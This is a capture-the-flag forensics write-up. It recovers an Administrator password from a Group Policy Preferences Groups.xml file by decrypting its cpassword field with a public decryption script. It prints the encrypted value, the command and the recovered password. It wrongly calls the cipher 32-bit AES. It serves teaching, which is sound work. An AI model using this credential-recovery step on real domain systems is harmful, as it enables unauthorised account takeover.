Forensics

I Lost my password can you find it?

The archive that we downloaded has a few files and a lot of directories.

find . -type f
./{C7BD6C6D-A1C8-4C23-815E-3D8D4187640F}/GPT.INI
./{C7BD6C6D-A1C8-4C23-815E-3D8D4187640F}/Machine/Microsoft/Windows NT/SecEdit/GptTmpl.inf
./{874C2133-64E1-4F2C-8BD8-71D9BD59643D}/GPT.INI
./{6AC1786C-016F-11D2-945F-00C04fB984F9}/GPT.INI
./{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf
./{75DE8F0A-DEC0-441F-AE29-90DFAFCF632B}/GPT.INI
./{75DE8F0A-DEC0-441F-AE29-90DFAFCF632B}/User/Preferences/Groups/Groups.xml
./{75DE8F0A-DEC0-441F-AE29-90DFAFCF632B}/Group Policy/GPE.INI
./{31B2F340-016D-11D2-945F-00C04FB984F9}/GPT.INI
./{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf
./{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Registry.pol

Most file are useless beside the file Groups.xml, it contains what we need.

<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="Administrator (built-in)" image="1" changed="2014-02-06 19:33:28" uid="{C73C0939-38FB-4287-AC48-478F614F5EF7}" userContext="0" removePolicy="0"><Properties action="R" fullName="Administrator" description="Administrator" cpassword="PCXrmCkYWyRRx3bf+zqEydW9/trbFToMDx6fAvmeCDw" changeLogon="0" noChange="0" neverExpires="1" acctDisabled="0" subAuthority="" userName="Administrator (built-in)"/></User> </Groups>

The field cpassword can be decrypted. The password is encrypted with AES-32 bits and uses the same AES key to encrypt all of them eh. The key can be found here.

http://msdn.microsoft.com/en-us/library/2c15cbf0-f086-4c74-8b70-1f2fa45dd4be%28v=PROT.13%29#endNote2

We’ll use the following script to decrypt it. I didn’t make it, i found it here.

https://raw.githubusercontent.com/leonteale/pentestpackage/master/Gpprefdecrypt.py

python Gpprefdecrypt.py PCXrmCkYWyRRx3bf+zqEydW9/trbFToMDx6fAvmeCDw

LocalRoot!

The flag is LocalRoot!